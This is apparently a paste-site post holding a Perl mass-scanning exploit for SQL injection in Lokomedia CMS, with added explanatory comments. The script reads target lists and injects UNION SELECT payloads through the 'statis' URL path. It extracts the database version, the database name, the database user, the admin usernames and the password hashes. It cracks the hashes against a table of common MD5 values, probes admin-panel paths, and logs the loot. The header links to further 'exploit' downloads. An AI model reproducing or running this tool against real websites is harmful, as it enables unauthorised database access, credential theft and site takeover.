Mandra-Crew_MemberZ

Lokomedia CMS Remote SQL Injection

Mar 19th, 2018
  1. # Exploit Title :    Lokomedia CMS Remote SQL Injection Exploit Vulnerability
  2. # Exploit Author :   el ZinDYanII-tN
  3. # TargetS :          list.txt :p
  4. # Tested on :        [ WIN 8.1 ]
  5. # dork :              :p
  6. # fb team page :     http://linkshrink.net/7vjXkA
  7. # fb Author :        http://linkshrink.net/7ta538
  8. # video Proof :      http://linkshrink.net/7ZSPhq
  9. # More Exploit :     http://linkshrink.net/7NyfBE
  10. # team :             mandra crew memberZ
  11. # Date:              17/10/2017
  12. ######################
  13. # Music :            RedStar Radi - Yohka Anna (يحكى أن )
  14. # Discovered by :    el ZinDYanII-tN
  15. # Greetz :           [ Spawn_Z | SerialBack  | pedro vortex | adminet ]
  16. ######################
  17. ######################
  18. # DOWNLOAD TOOL :    http://linkshrink.net/7NyfBE
  19. use LWP::UserAgent;
  20. use HTTP::Request::Common;
  21. use Term::ANSIColor;
  22. use Win32::Console::ANSI;
  23. use HTTP::Request::Common qw(GET);
  24. use LWP::UserAgent;
  25. use WWW::Mechanize;  
  26. use Socket;
  27. use HTTP::Request;
  28. use IO::Select;
  29. use HTTP::Response;
  30. use HTTP::Request::Common qw(POST);
  31. use URI::URL;
  32. use IO::Socket::INET;
# File-scoped state shared by every sub below (the script relies on package
# globals throughout; only $ua and $time are lexicals).
$mech = WWW::Mechanize->new(autocheck => 0);   # created here but not used anywhere else in this file
my $ua = LWP::UserAgent->new;                  # client used by the probe subs; lokopanel() replaces it
$ua->timeout(10);                              # seconds per request for the probe subs
my $time    = localtime;                       # shown in the banner as the start time
# Output directory used by save(). Control flow is worth noting: when the
# directory does not exist yet it is created and the script ends without calling
# begin(); begin() only runs on a later invocation once the directory is present.
$res="MCMrzlt";if (-e $res){begin();}else{mkdir $res or die "WE CAN NOT CREATE THE BOARD OF DIRECTORS: $res";}
# Dispatch on argument count: exactly one argument goes to onetofuck() (single
# target or list file), anything else to manytofuck(), which prompts on STDIN.
# The "()" after each sub name in this file is a Perl prototype, not a signature.
sub begin(){if(@ARGV != 1) { manytofuck(); }else { onetofuck(); }}
# Interactive list mode (argument count other than one). Clears the terminal,
# prints the banner, reads a list-file name from STDIN and runs lokomedia()
# once per line of that file, with the line (chomped) in the global $site.
# Notes for a reader: the STDIN value is not chomped before the 2-arg open with
# a bareword handle; the open failure message does not include $!; $link, the
# OUTER label and $a (Perl's sort variable) are set but never read.
sub manytofuck(){if ($^O =~ /MSWin32/) {system("cls"); }else { system("clear"); }system ("title mandra crew web-fucker V2.1");
# banner (identical copies live in onetofuck() and listt())
print colored ("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++",'black on_red'),"\n";print color('reset');
print colored ("                       [ c0d3d bY ManDra creW membere ]                        ",'white on_red'),"\n";print color('reset');
print colored ("                               [ elZinDYanII-tN ]                              ",'white on_red'),"\n";print color('reset');
print colored ("                              [ Version 2.1 baby ]                             ",'white on_red'),"\n";print color('reset');
print colored ("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++",'black on_red'),"\n";  print color('reset');                                  
print colored ("\n                     ___ ___ _____ _______ __          __                    ",'green on_black'),"\n";print color('reset');
print colored ("                    |   Y   | _   |   _   |  |--.-----|  |_                    ",'green on_black'),"\n";print color('reset');
print colored ("                    |.      |.|   |___|   |  _  |  _  |   _|                   ",'green on_black'),"\n";print color('reset');
print colored ("                    |. |_|  `-|.  |_(__   |_____|_____|____|                   ",'green on_black'),"\n";print color('reset');
print colored ("                    |:  |   | |:  |:  1   |  mandra crew                       ",'green on_black'),"\n";print color('reset');
print colored ("                    |::.|:. | |::.|::.. . |  Loko-fucker                       ",'green on_black'),"\n";print color('reset');
print colored ("                    `--- ---' `---`-------'                                    ",'green on_black'),"\n\n"; print color('reset');                          
print colored ("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++",'black on_red'),"\n";print color('reset');
print colored ("                                  [ thnx f0r ]                                 ",'white on_red'),"\n";print color('reset');
print colored ("               [ Spawn_Z | SerialBack  | pedro vortex | adminet ]              ",'white on_red'),"\n";print color('reset');
print colored ("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++",'black on_red'),"\n\n";print color('reset');
print colored ("                       Start At $time                                          ",'white on_black'),"\n";print color('reset');
print "\n\n\n\tPut Ur List Plz : ";
$list=<STDIN>;
print "\n\n";
# 2-arg open on user-supplied text; the handle is a package-global bareword
open (THETARGET, "<$list") || die "[-] Can't open the file";
@TARGETS = <THETARGET>;
close THETARGET;
$link=$#TARGETS + 1;
print color("bold white"), "[+] Total sites : ";
print color("bold red"), "".scalar(@TARGETS)."\n\n";
print color('reset');
# one full probe cycle per list entry; lokomedia() reads $site as a global
OUTER: foreach $site(@TARGETS){
chomp($site);
$a++;
lokomedia();
}}
# Single-argument mode. Prints the banner, then: if $ARGV[0] contains neither
# "http://" nor "https://" it is treated as a list file and handed to listt();
# otherwise it is the target URL. lokomedia() is called unconditionally after
# that check, so when listt() was used the last list entry (left in the global
# $site by listt's loop) is probed a second time.
sub onetofuck() {if ($^O =~ /MSWin32/) {system("cls"); }else { system("clear"); }system ("title mandra crew web-fucker V2.1");
# banner (same text as manytofuck() and listt())
print colored ("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++",'black on_red'),"\n";print color('reset');
print colored ("                       [ c0d3d bY ManDra creW membere ]                        ",'white on_red'),"\n";print color('reset');
print colored ("                               [ elZinDYanII-tN ]                              ",'white on_red'),"\n";print color('reset');
print colored ("                              [ Version 2.1 baby ]                             ",'white on_red'),"\n";print color('reset');
print colored ("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++",'black on_red'),"\n";  print color('reset');                                  
print colored ("\n                     ___ ___ _____ _______ __          __                    ",'green on_black'),"\n";print color('reset');
print colored ("                    |   Y   | _   |   _   |  |--.-----|  |_                    ",'green on_black'),"\n";print color('reset');
print colored ("                    |.      |.|   |___|   |  _  |  _  |   _|                   ",'green on_black'),"\n";print color('reset');
print colored ("                    |. |_|  `-|.  |_(__   |_____|_____|____|                   ",'green on_black'),"\n";print color('reset');
print colored ("                    |:  |   | |:  |:  1   |  mandra crew                       ",'green on_black'),"\n";print color('reset');
print colored ("                    |::.|:. | |::.|::.. . |  Loko-fucker                       ",'green on_black'),"\n";print color('reset');
print colored ("                    `--- ---' `---`-------'                                    ",'green on_black'),"\n\n"; print color('reset');                          
print colored ("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++",'black on_red'),"\n";print color('reset');
print colored ("                                  [ thnx f0r ]                                 ",'white on_red'),"\n";print color('reset');
print colored ("               [ Spawn_Z | SerialBack  | pedro vortex | adminet ]              ",'white on_red'),"\n";print color('reset');
print colored ("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++",'black on_red'),"\n\n";print color('reset');
print colored ("                       Start At $time                                          ",'white on_black'),"\n";print color('reset');
  $site = $ARGV[0];
 # the match is unanchored, so the scheme may appear anywhere in the argument
 if($site !~ /https:\/\// && $site !~ /http:\/\// ) { listt(); };
lokomedia();
}
# List-file mode reached from onetofuck() when $ARGV[0] is not a URL. Same as
# manytofuck() except the file name comes from $ARGV[0] instead of STDIN: prints
# the banner, reads every line of the file and runs lokomedia() per entry.
# $link, the OUTER label and $a are assigned but never read.
sub listt() {if ($^O =~ /MSWin32/) {system("cls"); }else { system("clear"); }system ("title mandra crew web-fucker V2.1");
# banner (same text as manytofuck() and onetofuck())
print colored ("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++",'black on_red'),"\n";print color('reset');
print colored ("                       [ c0d3d bY ManDra creW membere ]                        ",'white on_red'),"\n";print color('reset');
print colored ("                               [ elZinDYanII-tN ]                              ",'white on_red'),"\n";print color('reset');
print colored ("                              [ Version 2.1 baby ]                             ",'white on_red'),"\n";print color('reset');
print colored ("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++",'black on_red'),"\n";  print color('reset');                                  
print colored ("\n                     ___ ___ _____ _______ __          __                    ",'green on_black'),"\n";print color('reset');
print colored ("                    |   Y   | _   |   _   |  |--.-----|  |_                    ",'green on_black'),"\n";print color('reset');
print colored ("                    |.      |.|   |___|   |  _  |  _  |   _|                   ",'green on_black'),"\n";print color('reset');
print colored ("                    |. |_|  `-|.  |_(__   |_____|_____|____|                   ",'green on_black'),"\n";print color('reset');
print colored ("                    |:  |   | |:  |:  1   |  mandra crew                       ",'green on_black'),"\n";print color('reset');
print colored ("                    |::.|:. | |::.|::.. . |  Loko-fucker                       ",'green on_black'),"\n";print color('reset');
print colored ("                    `--- ---' `---`-------'                                    ",'green on_black'),"\n\n"; print color('reset');                          
print colored ("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++",'black on_red'),"\n";print color('reset');
print colored ("                                  [ thnx f0r ]                                 ",'white on_red'),"\n";print color('reset');
print colored ("               [ Spawn_Z | SerialBack  | pedro vortex | adminet ]              ",'white on_red'),"\n";print color('reset');
print colored ("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++",'black on_red'),"\n\n";print color('reset');
print colored ("                       Start At $time                                          ",'white on_black'),"\n";print color('reset');
$list=$ARGV[0];
# 2-arg open with a bareword handle on a command-line argument
open (THETARGET, "<$list") || die "[-] Can't open the file";
@TARGETS = <THETARGET>;
close THETARGET;
$link=$#TARGETS + 1;
print color("bold white"), "[+] Total sites : ";
print color("bold red"), "".scalar(@TARGETS)."\n\n";
print color('reset');
# $site stays set to the last entry after the loop; onetofuck() relies on that
OUTER: foreach $site(@TARGETS){
chomp($site);
$a++;
lokomedia();
}}
# Per-target driver. Reads the global $site, builds the five probe URLs into
# globals, then runs the probe subs, the admin-path check and save() in order.
# All five URLs share one request shape and differ only in the selected
# expression; that literal path ("statis--7'union select ... kantordesa.html"
# under the site root) is the string a defender would look for in web-server
# access logs or a WAF rule when hunting for this scanner.
sub lokomedia(){            
print "[+]";
print color("bold white"), "[-lokomedia-]....";
print color('reset');
print " $site\n";
print color('green'),"\n[*]-[*]";
print color('bold green'),"    [Lokomedia DB-scanner V1]\n";
print color('reset');
$lokoversion = "$site/statis--7'union select /*!50000Concat*/(Version())+from+users--+--+kantordesa.html";
$lokodatabase = "$site/statis--7'union select /*!50000Concat*/(Database())+from+users--+--+kantordesa.html";
$lokouserdata = "$site/statis--7'union select /*!50000Concat*/(USER())+from+users--+--+kantordesa.html";
$lokouser = "$site/statis--7'union select /*!50000Concat*/(username)+from+users--+--+kantordesa.html";
$lokopass = "$site/statis--7'union select /*!50000Concat*/(password)+from+users--+--+kantordesa.html";
# each probe sub stores its result in a global that save() reads afterwards
username();
password();
mysqlversion();
Current_Database();
Current_Username();
lokopanel();
save();
}
# Fetches $lokoversion and scrapes the returned value out of the page's
# <meta name="description" content="..."> tag, which is where the probe subs
# expect the selected expression to be reflected. Stores it in global $dbv for
# save() and prints it only if it contains a lowercase letter. Unlike the other
# probe subs, a response without that meta tag prints nothing at all (no
# [ERROR], no newline).
sub mysqlversion(){             print color('green'),"  [+] [MySQL Version :    ";
my $checklokoversion = $ua->get("$lokoversion")->content;
# greedy (.*) takes everything up to the last ">" on the matching line
if($checklokoversion =~/<meta name="description" content="(.*)">/) {
$dbv=$1;
if($dbv =~ /[a-z]/){
print color('bold white'),"$dbv\n";
print color('reset');
}else {print color('bold red'),"[ERROR]\n";print color('reset');}
}
}
# Fetches $lokodatabase and scrapes the reflected value from the page's meta
# description tag into global $db for save(). Prints [ERROR] when the tag is
# absent; $db then keeps whatever value it had from a previous target.
sub Current_Database(){         print color('green'),"  [+] [Current Database : ";
my $checklokodatabase = $ua->get("$lokodatabase")->content;
if($checklokodatabase =~/<meta name="description" content="(.*)">/) {
$db=$1;
print color('bold white'),"$db\n";print color('reset');
}else {print color('bold red'),"[ERROR]\n";print color('reset');}
}
# Fetches $lokouserdata and scrapes the reflected value from the page's meta
# description tag into global $udb for save(). Prints [ERROR] when the tag is
# absent; $udb is not reset in that case.
sub Current_Username(){         print color('green'),"  [+] [Current Username : ";
my $checklokouserdata = $ua->get("$lokouserdata")->content;
if($checklokouserdata =~/<meta name="description" content="(.*)">/) {
$udb=$1;
print color('bold white'),"$udb\n";print color('reset');
}else {print color('bold red'),"[ERROR]\n";print color('reset');}
}
# Fetches $lokouser and scrapes the reflected value from the page's meta
# description tag into global $user for save(). Prints [ERROR] when the tag is
# absent; $user is not reset in that case.
sub username(){                 print color('green'),"  [+] [Username :         ";
my $checklokouser = $ua->get("$lokouser")->content;
if($checklokouser =~/<meta name="description" content="(.*)">/) {
$user=$1;
print color('bold white'),"$user\n";print color('reset');
}else {print color('bold red'),"[ERROR]\n";print color('reset');}
}
# Fetches $lokopass and scrapes the reflected value from the page's meta
# description tag into global $hash for save(), then hands it to lokohash()
# for the fixed-list digest lookup. Prints [ERROR] when the tag is absent;
# $hash is not reset in that case and lokohash() is not called.
sub password(){                 print color('green'),"  [+] [Password :         ";
my $checklokopass = $ua->get("$lokopass")->content;
if($checklokopass =~/<meta name="description" content="(.*)">/) {
$hash=$1;
print color('bold white'),"$hash\n";print color('reset');
lokohash();
}else{
 print color('bold red'),"[ERROR]\n";print color('reset');}
}
# Maps the scraped digest in global $hash to a plaintext from a fixed list of
# ten common passwords and stores the match in global $pass for save().
# The digests are 32 hex characters and match well-known unsalted MD5 values
# (for instance 5f4dcc3b5aa765d61d8327deb882cf99 is the MD5 of "password"),
# which is why a table this small is useful at all; salted, slow password
# hashing on the application side makes such a lookup pointless.
# Each comparison is an unanchored regex, so it also matches if the digest is
# embedded in a longer string. On a miss $pass is left untouched (it may still
# hold a previous target's value) and no colour reset is printed.
sub lokohash(){                 print color('green'),"    [-] [hash Password :  ";
$p1="admin123456";
$p2="admin123";
$p3="ADMIN";
$p4="Administrator";
$p5="default";
$p6="pass";
$p7="password";
$p8="test";
$p9="admin";
$p10="demo";
if ($hash =~ /a66abb5684c45962d887564f08346e8d/){
print color('bold white'),"$p1\n";$pass=$p1;}
elsif ($hash =~ /0192023a7bbd73250516f069df18b500/){
print color('bold white'),"$p2\n";$pass=$p2;}
elsif ($hash =~ /73acd9a5972130b75066c82595a1fae3/){
print color('bold white'),"$p3\n";$pass=$p3;}
elsif ($hash =~ /7b7bc2512ee1fedcd76bdc68926d4f7b/){
print color('bold white'),"$p4\n";$pass=$p4;}
elsif ($hash =~ /c21f969b5f03d33d43e04f8f136e7682/){
print color('bold white'),"$p5\n";$pass=$p5;}
elsif ($hash =~ /1a1dc91c907325c69271ddf0c944bc72/){
print color('bold white'),"$p6\n";$pass=$p6;}
elsif ($hash =~ /5f4dcc3b5aa765d61d8327deb882cf99/){
print color('bold white'),"$p7\n";$pass=$p7;}
elsif ($hash =~ /098f6bcd4621d373cade4e832627b4f6/){
print color('bold white'),"$p8\n";$pass=$p8;}
elsif ($hash =~ /21232f297a57a5a743894a0e4a801fc3/){
print color('bold white'),"$p9\n";$pass=$p9;}
elsif ($hash =~ /fe01ce2a7fbac8fafaed7c982a04e229/){
print color('bold white'),"$p10\n";$pass=$p10;}
else{print color('bold red'),"[ERROR]\n";}
}
# Requests seven fixed admin-area paths under $site, one after another, and
# treats a response body containing any login-form word (English, Portuguese,
# Spanish, French variants) as a hit. Several patterns (/Personal/, /Sing/,
# /passe/) are broad enough to match ordinary pages, so hits are not reliable.
# Side effects: the file-scoped $ua is replaced here with a new client (fixed
# User-Agent string, 15 s timeout) and that object is what the probe subs use
# on later targets; the requests inside the loop actually go through the inner
# lexical $ua (30 s timeout), which shadows it. On a hit the global $pathone is
# printed, but nothing in this file assigns $pathone; on a miss the probed URL
# is printed.
sub lokopanel(){                print color('green'),"  [+] [Admin Panel :      ";
$ua = LWP::UserAgent->new();
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
$ua->timeout(15);
@lokoadminpath =  ('/redaktur','/adminweb','/administrator','/redaktur/index.php','/adminlogin','/admin','/login.php',);
foreach $lap(@lokoadminpath){
$final=$site.$lap;
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);
# each alternative re-reads ->content; the match is case-sensitive and unanchored
if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/
){
print color('bold white'),"$pathone\n";print color('reset');
}else{
print color('bold red'),"[ERROR] $final\n";print color('reset');
}}}
# Appends one record for the current target to MCMrzlt/loko_db.txt (relative to
# the working directory; the directory is created at file scope). The open is
# unchecked and uses a bareword handle, so a failed open is silent and the
# print goes nowhere. Every field is a global that is never reset between
# targets, so when a probe fails for one site the record can carry the previous
# site's values for that field.
sub save(){
$aa="######################################################################";
open (TEXT, '>>MCMrzlt/loko_db.txt');
print TEXT "$aa\n[*] site : $site\n[+] [MySQL Version] : $dbv\n[+] [Current Database] : $db\n[+] [Current Username] : $udb\n[+] [Username] : $user\n[+] [Password encoded] : $hash\n  [-] [Password Craked] : $pass\n[+] [Admin Panel] : $pathone\n$aa\n";
close (TEXT)
}